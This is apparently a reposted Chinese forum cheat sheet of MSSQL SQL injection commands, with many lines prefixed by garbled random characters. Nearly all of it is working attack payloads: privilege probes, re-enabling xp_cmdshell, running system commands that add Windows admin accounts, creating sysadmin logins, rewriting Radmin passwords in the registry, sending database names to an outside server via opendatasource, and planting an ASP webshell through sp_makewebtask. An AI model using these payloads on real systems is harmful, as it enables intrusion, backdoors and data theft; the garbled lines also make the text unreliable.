阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
0 {6 U# ]$ Z7 O
//检测是否有读取某数据库的权限
) n# J4 m% l. V% |+ a" z% |and 1= (Select HAS_DBACCESS('master'))
+ k, \1 U3 Y: XAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


+ }. P$ ]4 j8 j数字类型
( p0 y; u3 F$ x  P# V3 ^" Zand char(124)%2Buser%2Bchar(124)=0

8 D) u% u  k! o3 X8 s- _, h4 \字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

" O* ^: V. Q/ j6 L) \搜索类型
: j1 ~. z, W2 k; }. `" R8 [" ~' and char(124)%2Buser%2Bchar(124)=0 and '%'='
/ c- l4 e! Y  U# L( J* h
爆用户名
! H. Q8 o; g3 _/ W1 Hand user>0
/ ^1 ?* t- f% t4 a( A' and user>0 and ''='
/ ]) t) S/ x1 t& n
检测是否为SA权限
2 x- ]; t/ i; O) O+ G' @and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
+ H3 _6 Q$ T$ _  h' s, S+ F% IAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
2 [) a' [, U5 x  K4 i. }; V
, s( E/ m7 p! V1 p& y6 M检测是不是MSSQL数据库
1 n8 O$ N4 m& j8 Eand exists (select * from sysobjects);--
1 d( A0 W5 f; d
- k) ], A  X$ \3 O# e检测是否支持多行
;declare @d int;--

' T- `: i7 q9 t/ h恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
  v' _+ V0 a% B2 q8 i! V- U

, R8 s- \3 r0 P% q& {( Rselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 a, `! G  E5 Q( H# ?* y5 A
& x% ~: R' I6 k' @5 O! J- e//-----------------------
  I# i3 S/ N2 [$ U9 S6 ?, ?//      执行命令
! O" _0 g) Q' @. i% R/ V, f//-----------------------
首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
" L# ^8 p- q5 nselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
3 `! w1 J9 J3 A4 X
执行命令
) q, A  m) p* f* A6 [4 Q$ k/ |4 @9 H;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

$ s/ }3 {; ]6 ^7 d( Q* @EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
$ i0 c( e! K- Y& xhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

/ Z/ _; ?3 k9 \* A写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
; \) P2 W- f. W6 k5 b
REG_SZ
$ Q, j9 b8 y5 ~2 Y- y  X! B! u
9 I  g9 l) V/ _, C8 b0 [读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
6 @4 |: e0 D. P2 X3 j
读取目录内容
1 b5 f. K' c5 j- Bexec master..xp_dirtree 'c:\winnt\system32\',1,1
1 x( R, g# r3 S9 n/ b. m) R' {2 G+ D
- e) W% l2 i# f0 F! Z  \
, o7 F/ a, M  q: S5 ?( G数据库备份
backup database pubs to disk = 'c:\123.bak'

; j0 s7 T6 l. `4 `6 M//爆出长度
/ I) G+ z' K. P( R7 _And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--


* F3 }9 b" k; P1 h
# w2 b7 l; [- }更改sa口令方法：用sql综合利用工具连接后，执行命令：
2 A) w% z8 }/ N0 a8 y: ]exec sp_password NULL,'新密码','sa'
) X5 }: J7 s# U3 L. b( w
添加和删除一个SA权限的用户test：
5 F. C+ g8 l4 n9 `+ ]& Dexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

! Z9 @0 ~1 R" j( [9 A删除扩展存储过过程xp_cmdshell的语句:
  u5 J3 C9 K1 n: _# ?& R8 yexec sp_dropextendedproc 'xp_cmdshell'
: L8 J* N' }% a2 I, Y
添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
, H$ k, G6 F" r2 m8 }6 h6 FGRANT exec On xp_proxiedadata TO public

, W# b3 t9 K' p7 J
停掉或激活某个服务。
$ B% y& h9 |+ `8 r! b- a6 w5 S5 n
exec master..xp_servicecontrol 'stop','schedule'
' J8 A( u9 V0 H. {exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
. C% _  I) v9 d) \! ^
  @- P4 A( O6 ^5 T, t2 _4 kdbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
; }9 v  I( ^+ f6 T: k0 `6 w( D
dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
3 H& c0 K! r- ~8 R* h'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
6 Y/ }* k5 l2 p3 ~1 Y. ^, }
$ @5 K2 q) {! Jxp_terminate_process
+ w5 ?) f7 T5 r. A  T/ ^
停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
/ A, T; `  i8 o# _0 t' N7 Y2 E
xp_terminate_process 2484

xp_unpackcab

$ `& m7 C+ U: X; C0 ]/ w  a解开压缩档。
, e8 w9 N2 U" O  ?% W. t7 m6 A
0 J  D6 ~* Z$ f( L, mxp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
3 A- g2 f( o2 e8 ~6 z2 T9 QCreate TABLE ku(name nvarchar(256) null);
9 @( \- D* w# w& g6 t' q$ Z  R' t2 B1 DCreate TABLE biao(id int NULL,name nvarchar(256) null);
8 X4 ~, V1 j. r2 W5 H0 O
//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
, ?5 M5 k2 r. _

//在Master中创建表，看看权限怎样
# b$ o9 o4 B) Z( |- }% C& U; fCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

9 O* J5 C- s7 b* D2 h5 N4 ~" F8 A//更新表内容
) b( V+ {! |! ^" M; M. DUpdate films SET kind = 'Dramatic' Where id = 123

//删除内容
5 o7 n! b/ `0 j( R5 h) X$ Adelete from table_name where Stockid = 3